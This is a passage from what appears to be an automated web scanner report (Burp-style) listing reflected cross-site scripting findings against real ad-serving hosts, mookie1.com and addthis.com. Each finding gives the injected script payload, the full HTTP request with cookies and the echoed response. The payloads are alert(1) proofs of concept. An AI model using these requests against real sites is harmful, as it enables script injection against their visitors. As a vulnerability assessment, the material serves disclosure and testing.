Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011PnAYfG102PB|E106w2|U106y5|G10C7a|G10CEj; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e5045525d5f4f58455e445a4a423660; other_20110126=set; dlx_XXX=set; dlx_20100929=set; session=1297259893|1297260360

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 14:30:04 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 333
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM68a03"><script>alert(1)</script>dd801c10d99/2010DM/265696778/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><I
...[SNIP]...

1.91. http://dm.de.mookie1.com/2/B3DM/2010DM/11311693468@x23 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11311693468@x23

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8fa85"><script>alert(1)</script>e0cd33b110 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM8fa85"><script>alert(1)</script>e0cd33b110/11311693468@x23?USNetwork/FarmB_2011Q1_RocketF_BTRT1_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297259930614@x90
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011PnAYfG102PB|E106w2|U106y5|G10C7a|G10CEj; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e5045525d5f4f58455e445a4a423660; other_20110126=set; dlx_XXX=set; dlx_20100929=set; session=1297259893|1297260360

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 14:30:06 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 332
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM8fa85"><script>alert(1)</script>e0cd33b110/245402735/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><IM
...[SNIP]...

1.92. http://dm.de.mookie1.com/2/B3DM/2010DM/11311693468@x23 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11311693468@x23

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad727"><script>alert(1)</script>6653daacdbc was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM/11311693468@x23ad727"><script>alert(1)</script>6653daacdbc?USNetwork/FarmB_2011Q1_RocketF_BTRT1_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297259930614@x90
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011PnAYfG102PB|E106w2|U106y5|G10C7a|G10CEj; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e5045525d5f4f58455e445a4a423660; other_20110126=set; dlx_XXX=set; dlx_20100929=set; session=1297259893|1297260360

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 14:30:10 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 326
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM/2104859421/x23ad727"><script>alert(1)</script>6653daacdbc/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

1.93. http://dm.de.mookie1.com/2/B3DM/2010DM/11343771873@x23 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11343771873@x23

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a66af"><script>alert(1)</script>642529e6013 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DMa66af"><script>alert(1)</script>642529e6013/2010DM/11343771873@x23?USNetwork/FarmB_2011Q1_RocketF_BTRT1_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297259930614@x90
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011PnAYfG102PB|E106w2|U106y5|G10C7a|G10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; session=1297259893|1297261770; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 14:49:27 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6c45525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DMa66af"><script>alert(1)</script>642529e6013/2010DM/1169820156/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

1.94. http://dm.de.mookie1.com/2/B3DM/2010DM/11343771873@x23 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11343771873@x23

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 941ca"><script>alert(1)</script>56840368bce was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM941ca"><script>alert(1)</script>56840368bce/11343771873@x23?USNetwork/FarmB_2011Q1_RocketF_BTRT1_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297259930614@x90
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011PnAYfG102PB|E106w2|U106y5|G10C7a|G10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; session=1297259893|1297261770; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 14:49:41 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM941ca"><script>alert(1)</script>56840368bce/1264660409/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

1.95. http://dm.de.mookie1.com/2/B3DM/2010DM/11343771873@x23 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11343771873@x23

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6122"><script>alert(1)</script>5136673dd89 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM/11343771873@x23e6122"><script>alert(1)</script>5136673dd89?USNetwork/FarmB_2011Q1_RocketF_BTRT1_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297259930614@x90
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011PnAYfG102PB|E106w2|U106y5|G10C7a|G10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; session=1297259893|1297261770; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 14:49:55 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 325
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2145525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM/499328110/x23e6122"><script>alert(1)</script>5136673dd89/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><I
...[SNIP]...

1.96. http://dm.de.mookie1.com/2/B3DM/DLX/1937870846@x92 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/DLX/1937870846@x92

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59059"><script>alert(1)</script>225e1a98943 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM59059"><script>alert(1)</script>225e1a98943/DLX/1937870846@x92? HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/11256086249@x23?USNetwork/FarmB_2011Q1_RocketF_BTRT1_728
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1297259893|1297259893; RMFM=011PnAYfG102PB|E106w2|U106y5|G10C7a|G10CEj; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e5045525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 13:59:09 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 330
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM59059"><script>alert(1)</script>225e1a98943/DLX/281813167/x92/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><IMG
...[SNIP]...

1.97. http://dm.de.mookie1.com/2/B3DM/DLX/1937870846@x92 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/DLX/1937870846@x92

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b439"><script>alert(1)</script>010ab70397b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/DLX8b439"><script>alert(1)</script>010ab70397b/1937870846@x92? HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/11256086249@x23?USNetwork/FarmB_2011Q1_RocketF_BTRT1_728
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1297259893|1297259893; RMFM=011PnAYfG102PB|E106w2|U106y5|G10C7a|G10CEj; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e5045525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 13:59:11 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 330
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/DLX8b439"><script>alert(1)</script>010ab70397b/356583141/x92/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><IMG
...[SNIP]...

1.98. http://dm.de.mookie1.com/2/B3DM/DLX/1937870846@x92 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/DLX/1937870846@x92

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41a70"><script>alert(1)</script>67d67439bda was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/DLX/1937870846@x9241a70"><script>alert(1)</script>67d67439bda? HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/11256086249@x23?USNetwork/FarmB_2011Q1_RocketF_BTRT1_728
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1297259893|1297259893; RMFM=011PnAYfG102PB|E106w2|U106y5|G10C7a|G10CEj; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e5045525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 13:59:13 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 323
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/DLX/2098862732/x9241a70"><script>alert(1)</script>67d67439bda/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><IMG
...[SNIP]...

1.99. http://dm.de.mookie1.com/2/B3DM/DLX/1937870846@x92 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/DLX/1937870846@x92

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ddf1c"-alert(1)-"05464a05234 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/B3DM/DLX/1937870846@x92??ddf1c"-alert(1)-"05464a05234=1 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/11256086249@x23?USNetwork/FarmB_2011Q1_RocketF_BTRT1_728
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1297259893|1297259893; RMFM=011PnAYfG102PB|E106w2|U106y5|G10C7a|G10CEj; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e5045525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 13:59:08 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2407
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="?ddf1c"-alert(1)-"05464a05234=1";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){
   if((cookie_check("dlx_20100929=",document.cookie)).length == 0) {

       // Set cookie with marker to
...[SNIP]...

1.100. http://dm.de.mookie1.com/2/B3DM/DLX/@x94 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/DLX/@x94

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13310"><script>alert(1)</script>2c6810a43ca was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM13310"><script>alert(1)</script>2c6810a43ca/DLX/@x94 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://mig.nexac.com/2/B3DM/DLX/1@x96
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011PnAYfG102PB|E106w2|U106y5|G10C7a|G10CEj; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e5045525d5f4f58455e445a4a423660; dlx_20100929=set; other_20110126=set; session=1297259893|1297259896

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 13:59:41 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 330
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM13310"><script>alert(1)</script>2c6810a43ca/DLX/212367073/x94/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><IMG
...[SNIP]...

1.101. http://dm.de.mookie1.com/2/B3DM/DLX/@x94 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/DLX/@x94

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 121be"><script>alert(1)</script>f7b3acbc85f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/DLX121be"><script>alert(1)</script>f7b3acbc85f/@x94 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://mig.nexac.com/2/B3DM/DLX/1@x96
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011PnAYfG102PB|E106w2|U106y5|G10C7a|G10CEj; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e5045525d5f4f58455e445a4a423660; dlx_20100929=set; other_20110126=set; session=1297259893|1297259896

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 13:59:43 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 330
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/DLX121be"><script>alert(1)</script>f7b3acbc85f/544194934/x94/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><IMG
...[SNIP]...

1.102. http://dm.de.mookie1.com/2/B3DM/DLX/@x94 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/DLX/@x94

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40efc"><script>alert(1)</script>c621429c4d4 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/DLX/@x9440efc"><script>alert(1)</script>c621429c4d4 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://mig.nexac.com/2/B3DM/DLX/1@x96
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011PnAYfG102PB|E106w2|U106y5|G10C7a|G10CEj; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e5045525d5f4f58455e445a4a423660; dlx_20100929=set; other_20110126=set; session=1297259893|1297259896

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 13:59:45 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 322
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/DLX/611467003/x9440efc"><script>alert(1)</script>c621429c4d4/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><IMG
...[SNIP]...

1.103. http://ds.addthis.com/red/psi/sites/xhtml.co.il/p.json [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/xhtml.co.il/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload eb035<script>alert(1)</script>a932842a89f was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/xhtml.co.il/p.json?callback=_ate.ad.hpreb035<script>alert(1)</script>a932842a89f&uid=4d1ec56b7612a62c&url=http%3A%2F%2Fxhtml.co.il%2F%2Fhe%2Fpage-700%2FjQuery%3F72f1f&ref=http%3A%2F%2Fburp%2Fshow%2F12&1voxbg HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh31.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
